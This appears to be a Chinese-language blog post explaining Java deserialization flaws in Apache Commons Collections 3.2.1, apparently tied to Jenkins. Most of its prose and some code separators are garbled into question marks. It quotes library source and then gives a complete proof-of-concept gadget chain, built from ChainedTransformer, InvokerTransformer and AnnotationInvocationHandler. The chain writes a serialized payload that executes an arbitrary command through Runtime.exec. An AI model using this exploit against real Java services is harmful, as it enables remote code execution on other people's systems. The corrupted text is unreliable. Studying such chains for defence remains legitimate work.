????jenkins???????????????????????????????????????????????????????JAVA?????л??????????????е????????????????б??????JAVA?????л????????????
????JAVA?????л????
?????????л???????????????л??????????????????????磬???1???????????????л???????????л??????б??????????????????????????????????й?????????????????????δ??????л??????????????·????л????????????Java???л????????RMI(Java Remote Method Invocatio?? ??????????)?? JMX(Java Management Extensions?? Java???????)?? JMS(Java Message Service?? Java???????) ?????С?
????????Apache Commons Collections????????????
????Apache Commons Collections???????????????????Щ???????????л?????????????????С?????????Apache Commons Collections 3.2.1???????????ι?????????????????????л?????????readObject()????????????????????С?
???????÷????????????????
?????????о???????? InvokerTransformer ???е? transform() ??????????????? ??в?????????????????????????н????
public classInvokerTransformerimplementsTransformer??Serializable{
private static final long serialVersionUID = -8653385846894047688L;
private final String iMethodName;
private final Class[] iParamTypes;
private final Object[] iArgs;
privateInvokerTransformer(String methodName){
this.iMethodName = methodName;
this.iParamTypes = null;
this.iArgs = null;
}
publicInvokerTransformer(String methodName?? Class[] paramTypes?? Object[] args){
this.iMethodName = methodName;
this.iParamTypes = paramTypes;
this.iArgs = args;
}
publicObjecttransform(Object input){
if(input == null) {
return null;
} else {
try {
Class cls = input.getClass();
Method method = cls.getMethod(this.iMethodName?? this.iParamTypes);
return method.invoke(input?? this.iArgs);
}
???????????????? transform() ??????????????????? StringBuffer ??? append() ??????????????
????????transform()????
?????????????????????????????? InvokerTransformer ???е? transform() ???????????????С?
????Apache Commons Collections??????? TransformedMap ???????? Map ???????任???????? decorate() ??????????key??value??任???? Transformer ??????????? Map ????????????? TransformedMap ?? decorate() ???????£?
????publicstaticMapdecorate(Map map?? Transformer keyTransformer?? Transformer valueTransformer){
????return new TransformedMap(map?? keyTransformer?? valueTransformer);
????}
????Transformer ????????????ж???? transform() ????????????????????????????????????????
????public interface Transformer {
????public Object transform(Object input);
????}
????????????? InvokerTransformer ??????? Transformer ??????????????????? InvokerTransformer ?? transform() ?????????????????????????????? TransformedMap ????? Transformer ????????????
????commons-collections 3.2.2 ???????? Map ??? put() ?????? MapEntry ??? setValue() ????????????? Transformer ???????? Transformer ????????????γ? ChainedTransformer ??
????????п?????????? Map ??? put() ????????????? InvokerTransformer ??? transform() ??????
???????????????
??????????????????? InvokerTransformer ??? transform() ??????????????????????????????????? Map ??? put() ?????? MapEntry ??? setValue() ??????????????????????????????????????л?(???? readObject() ????)???????? InvokerTransformer ??? transform() ???????′?????С?
????java???п??е? AnnotationInvocationHandler ?? ???????????? memberValues ?? Map ????????? readObject() ?????ж? memberValues ??????????? setValue() ??????
classAnnotationInvocationHandlerimplementsInvocationHandler??Serializable{
private final Class<? extends Annotation> type;
private final Map<String?? Object> memberValues;
AnnotationInvocationHandler(Class<? extends Annotation> type?? Map<String?? Object> memberValues) {
this.type = type;
this.memberValues = memberValues;
}
privatevoidreadObject(java.io.ObjectInputStream s)
throws java.io.IOException?? ClassNotFoundException {
s.defaultReadObject();
// Check to make sure that types have not evolved incompatibly
AnnotationType annotationType = null;
try {
annotationType = AnnotationType.getInstance(type);
} catch(IllegalArgumentException e) {
// Class is no longer an annotation type; all bets are off
return;
}
Map<String?? Class<?>> memberTypes = annotationType.memberTypes();
for (Map.Entry<String?? Object> memberValue : memberValues.entrySet()) {
String name = memberValue.getKey();
Class<?> memberType = memberTypes.get(name);
if (memberType != null) {  // i.e. member still exists
Object value = memberValue.getValue();
if (!(memberType.isInstance(value) ||
value instanceof ExceptionProxy)) {
// ??????????е?Transformer
memberValue.setValue(
new AnnotationTypeMismatchExceptionProxy(
value.getClass() + "[" + value + "]").setMember(
annotationType.members().get(name)));
????????????????????湹??? Map ?????? AnnotationInvocationHandler ?????????л????????? readObject() ?????л?????????????????С?
//
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
/**
* Created by js on 2017/5/6.
*/
public classTest{
publicstaticvoidmain(String[] args)throwsException{
/*
* Runtime.getRuntime().exec("open /Applications/Calculator.app");
*/
String command = (args.length != 0) ? args[0] : "/bin/sh??-c??open /Applications/Calculator.app";
String[] execArgs = command.split("??");
Transformer[] transforms = new Transformer[] {
new ConstantTransformer(Runtime.class)??
new InvokerTransformer(
"getMethod"??
new Class[] {String.class?? Class[].class}??
new Object[] {"getRuntime"?? new Class[0]}
)??
new InvokerTransformer(
"invoke"??
new Class[] {Object.class?? Object[].class}??
new Object[] {null?? new Object[0]}
)??
new InvokerTransformer(
"exec"??
new Class[] {String[].class}??
new Object[] {execArgs}
)
};
Transformer transformerChain = new ChainedTransformer(transforms);
Map tempMap = new HashMap();
tempMap.put("hack"?? "you");
Map exMap = TransformedMap.decorate(tempMap?? null?? transformerChain);
Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cls.getDeclaredConstructor(Class.class?? Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Target.class?? exMap);
File f = new File("payload1");
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
oos.writeObject(instance);
oos.flush();
oos.close();
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
// ???????????
Object newObj = ois.readObject();
ois.close();
}
}
??????ζ???????????????÷?????? Runtime() ??????????????????????:
????((Runtime) Runtime.class.getMethod("getRuntime"?? null).invoke(null?? null)).exec("/bin/sh -c open /Applications/Calculator.app")
??????????????л????????????????????????????????????ysoserial??????????????????? AnnotationInvocationHandler ?????????????????????????????JDK??汾?й??
?????: jdk1.8.0_112??????.